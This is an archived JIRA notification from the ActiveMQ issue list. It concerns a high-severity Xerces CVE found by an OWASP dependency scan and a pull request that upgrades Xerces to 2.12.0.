You are viewing a plain text version of this content. The canonical link for it is here.

Posted to issues@activemq.apache.org by "ASF GitHub Bot (JIRA)" <ji...@apache.org> on 2018/07/22 18:37:00 UTC

[jira] [Commented] (AMQ-6996) ActiveMQ 5.15.4 xercesImpl-2.11.0.jar which has one high severity CVE against it.

    [ https://issues.apache.org/jira/browse/AMQ-6996?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=16552117#comment-16552117 ] 

ASF GitHub Bot commented on AMQ-6996:
-------------------------------------

GitHub user jgoodyear opened a pull request:

    https://github.com/apache/activemq/pull/291

    [AMQ-6996] Update AMQ to use Xerces 2.12.0

    Update targeted for master (5.16.x).

You can merge this pull request into a Git repository by running:

    $ git pull https://github.com/jgoodyear/activemq AMQ-6996

Alternatively you can review and apply these changes as the patch at:

    https://github.com/apache/activemq/pull/291.patch

To close this pull request, make a commit to your master/trunk branch
with (at least) the following in the commit message:

    This closes #291
    
----
commit 38a9c00f51597d7814939a2b423eeb657add3a3d
Author: jgoodyear <ja...@...>
Date:   2018-07-22T18:32:09Z

    [AMQ-6996] Update AMQ to use Xerces 2.12.0

----


> ActiveMQ 5.15.4 xercesImpl-2.11.0.jar which has one high severity CVE against it.
> ---------------------------------------------------------------------------------
>
>                 Key: AMQ-6996
>                 URL: https://issues.apache.org/jira/browse/AMQ-6996
>             Project: ActiveMQ
>          Issue Type: Bug
>          Components: Broker, webconsole
>    Affects Versions: 5.15.4
>         Environment: Environment: Customer environment is a mix of Linux and Windows, Gig-LAN (Medical & Finacial services).  Will not accept the risk of having even one high severity CVE in thier environment. The cost of (SOX/HIPPA) insurence is too high to allow even one CVE with newly deployed systems.
>            Reporter: Albert Baker
>            Priority: Blocker
>
> ActiveMQ 5.15.4 xercesImpl-2.11.0.jar which has one high severity CVE against it.
> Discovered by adding OWASP Dependency check into ActiveMQ pom.xml and running the OWASP report.
> CVE-2012-0881 Severity:High  CVSS Score: 7.8 (AV:N/AC:L/Au:N/C:N/I:N/A:C)
> CWE: CWE-399 Resource Management Errors
> Apache Xerces2 Java allows remote attackers to cause a denial of service (CPU consumption) via a crafted message to an XML service, which triggers hash table collisions.
> CONFIRM - https://bugzilla.redhat.com/show_bug.cgi?id=787104
> MLIST - [oss-security] 20140708 Summer bug cleaning - some Hash DoS stuff
> Vulnerable Software & Versions:
> cpe:/a:apache:xerces2_java:2.11.0 and all previous versions



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)